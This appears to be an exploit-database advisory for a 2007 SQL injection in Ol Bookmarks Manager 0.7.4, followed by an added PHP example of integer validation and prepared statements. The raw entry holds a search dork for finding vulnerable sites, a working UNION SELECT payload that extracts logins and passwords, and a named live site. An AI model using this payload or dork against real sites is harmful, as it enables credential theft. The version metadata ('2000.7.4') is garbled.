Vendor: Ol Bookmarks Manager
By: Cyber-Security
CVSS: 7.5 (HIGH)
Type: SQL Injection
CWE: 89
Product Name: Ol Bookmarks Manager
Affected Version From: 2000.7.4
Affected Version To: 2000.7.4
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Ol Bookmarks Manager 0.7.4 (root) Remote SQL Injection Vulnerabilities

Ol Bookmarks Manager 0.7.4 (root) is vulnerable to remote SQL injection through the 'id' parameter of the '/read/index.php' script. An attacker can inject SQL into this parameter to retrieve sensitive information from the database, such as stored passwords and logins.

Mitigation:

The vendor has not provided a patch for this vulnerability. Users are advised to update to a newer version of the Ol Bookmarks Manager or to implement strict input validation to prevent SQL injection attacks.
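
One way to apply the input validation advised above, as an added example rather than code from Ol Bookmarks Manager: the id is checked as a plain integer and then bound through a prepared statement. The `bookmarks` table, its columns and the function names are assumptions; only the `preferences` table with its `login` and `password` columns comes from the advisory, and all rows are constructed.

```php
<?php
// Added example: hypothetical hardened lookup for a script like /read/index.php.
// The `bookmarks` table and its columns are assumptions, not the project's schema.

function parse_id($raw): ?int
{
    // Accept only a plain non-negative decimal integer; reject everything else.
    if (!is_string($raw) || !preg_match('/\A[0-9]{1,9}\z/', $raw)) {
        return null;
    }
    return (int) $raw;
}

function find_bookmark(PDO $db, $rawId): ?array
{
    $id = parse_id($rawId);
    if ($id === null) {
        return null; // the caller should answer 400 Bad Request
    }
    // The value is bound as a typed parameter, never concatenated into the SQL.
    $stmt = $db->prepare('SELECT id, title, url FROM bookmarks WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed in-memory database so the example runs offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE bookmarks (id INTEGER PRIMARY KEY, title TEXT, url TEXT)');
$db->exec('CREATE TABLE preferences (login TEXT, password TEXT)');
$db->exec("INSERT INTO bookmarks VALUES (1, 'Example', 'http://example.org/')");
$db->exec("INSERT INTO preferences VALUES ('admin', 'constructed-hash')");

// A legitimate id, followed by the id value from the advisory's request.
$inputs = [
    '1',
    '-1/**/union/**/select/**/0,1,2,3,4,5,password,login,8,9,10,11,12/**/from/**/preferences/*',
];
foreach ($inputs as $raw) {
    $row = find_bookmark($db, $raw);
    echo $row === null ? "rejected\n" : "found: {$row['title']}\n";
}
```

The integer check alone stops this request; the bound parameter keeps the query safe even if the validation is later loosened or bypassed.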

Exploit-DB raw data:

==========================================================================

Ol Bookmarks Manager 0.7.4 (root) Remote SQL Injection Vulnerabilities

==========================================================================

Found by: Cyber-Security

==========================================================================

D0rk : allintitle:ol'bookmarks

==========================================================================

Download: http://mesh.dl.sourceforge.net/sourceforge/olbookmarks/olbookmarks-0.7.4.tar.gz

==========================================================================

/read/index.php?name=alex&id=-1/**/union/**/select/**/0,1,2,3,4,5,password,login,8,9,10,11,12/**/from/**/preferences/*

Example: http://www.blex.co.uk/bookmarks

==========================================================================
thanx: ThE TiGeR because he found RFI to this script :)
==========================================================================

# milw0rm.com [2007-05-21]